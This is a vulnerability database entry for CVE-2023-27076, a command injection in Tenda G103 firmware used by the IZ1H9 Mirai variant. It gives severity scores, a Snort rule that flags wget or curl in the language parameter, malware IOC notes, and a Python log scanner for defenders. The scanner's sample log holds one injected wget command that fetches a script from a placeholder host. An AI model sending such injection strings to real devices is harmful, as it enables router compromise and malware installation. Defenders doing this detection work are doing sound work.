cbcvebase.
CVE-2023-27076
published 2023-04-10

CVE-2023-27076: Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows an attacker to execute arbitrary code via the language parameter.

Priority: P183
CVSS 3.1: 9.8 critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploited in the wild (VulnCheck KEV)
EPSS: 22.93% (97.5th percentile)

Affected (1 range)

Vendor | Product       | Version range | Fixed in
tenda  | g103_firmware |               |

Detection & IOCs (extracted from sources)

path: /cgi-bin/luci?language=

Snort rule:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/luci?language="; fast_pattern; startswith; pcre:"/(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9/; reference:cve,2023-27076; classtype:attempted-admin; sid:2048547; rev:1; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_27076, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_10_12, reviewed_at 2023_10_12, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services; target:dest_ip;)
  • The exploit targets the `language` parameter via an HTTP GET to /cgi-bin/luci; look for wget or curl in the URI (the rule's PCRE matches on the language parameter value)
  • IZ1H9 configuration strings are XOR-encrypted with an effective single-byte key of 0xEA (derived from the table key 0xBAADF00D); scan for this decryption pattern in samples
  • The Telnet/SSH credential brute-forcer uses a 1-byte XOR key of 0x54 to encrypt roughly 100 pairs of default login credentials in the scanner function
  • Palo Alto Threat Prevention signatures 93386, 93718, 93721 and 93722 cover the exploit traffic and malware associated with this campaign
  • In the Tenda exploit function the malware mistakenly downloads tenda.sh but executes netlog.sh; network detection should still alert on the download of tenda.sh from the malware host
  • The Tenda G103 exploit payload in this IZ1H9 sample is broken: it downloads tenda.sh but attempts to execute netlog.sh, so the exploit will not successfully run the intended downloader
  • Multiple campaigns share the same XOR key (0xBAADF00D / effective 0xEA) and near-identical shell script downloaders, suggesting a single threat actor operating across campaigns since November 2021
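The detection logic of the Snort rule above, rewritten as a log-side check so it can be run over web server access logs; this is an added example, not code from this page or from any vendor, and the log format and every sample line in it are constructed for illustration.

```python
# Added example: mirror the CVE-2023-27076 Snort rule (GET to
# /cgi-bin/luci?language= with wget or curl after that prefix) against
# access-log lines. Log format and sample lines are constructed, not real.
import re
from urllib.parse import unquote

URI_PREFIX = "/cgi-bin/luci?language="
# Combined-log-format shape (assumed): client IP ... "METHOD URI PROTO"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"'
)
# Same alternation as the rule's pcre, applied to the decoded URI remainder.
DOWNLOADER_RE = re.compile(r"wget|curl", re.IGNORECASE)


def is_cve_2023_27076_attempt(method: str, uri: str) -> bool:
    """True when the request has the shape the Snort rule alerts on."""
    if method != "GET" or not uri.startswith(URI_PREFIX):
        return False
    # Percent-decode so "%20wget" is seen as " wget"; the rule inspects the
    # normalized URI buffer, so decoding keeps the comparison equivalent.
    remainder = unquote(uri[len(URI_PREFIX):])
    return DOWNLOADER_RE.search(remainder) is not None


def scan_access_log(lines):
    """Return (client_ip, uri) for every line matching the exploit shape."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cve_2023_27076_attempt(m["method"], m["uri"]):
            hits.append((m["ip"], m["uri"]))
    return hits


# Constructed sample log: a benign language switch, one injection attempt
# carrying a wget download command (placeholder host), one POST that the
# GET-only rule deliberately ignores, and one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Oct/2023:10:00:01 +0000] "GET /cgi-bin/luci?language=en HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Oct/2023:10:00:02 +0000] "GET /cgi-bin/luci?language=en%3Bwget%20http%3A%2F%2Fdownloader.invalid%2Fx.sh HTTP/1.1" 500 0',
    '192.0.2.9 - - [12/Oct/2023:10:00:03 +0000] "POST /cgi-bin/luci?language=curl HTTP/1.1" 403 0',
    '203.0.113.5 - - [12/Oct/2023:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, uri in scan_access_log(SAMPLE_LOG):
        print(f"ALERT CVE-2023-27076 attempt from {ip}: {uri}")
```

Like the rule, the check is GET-only and only fires when the URI begins with the language parameter, so a deployment that wants broader coverage would relax both conditions.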

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL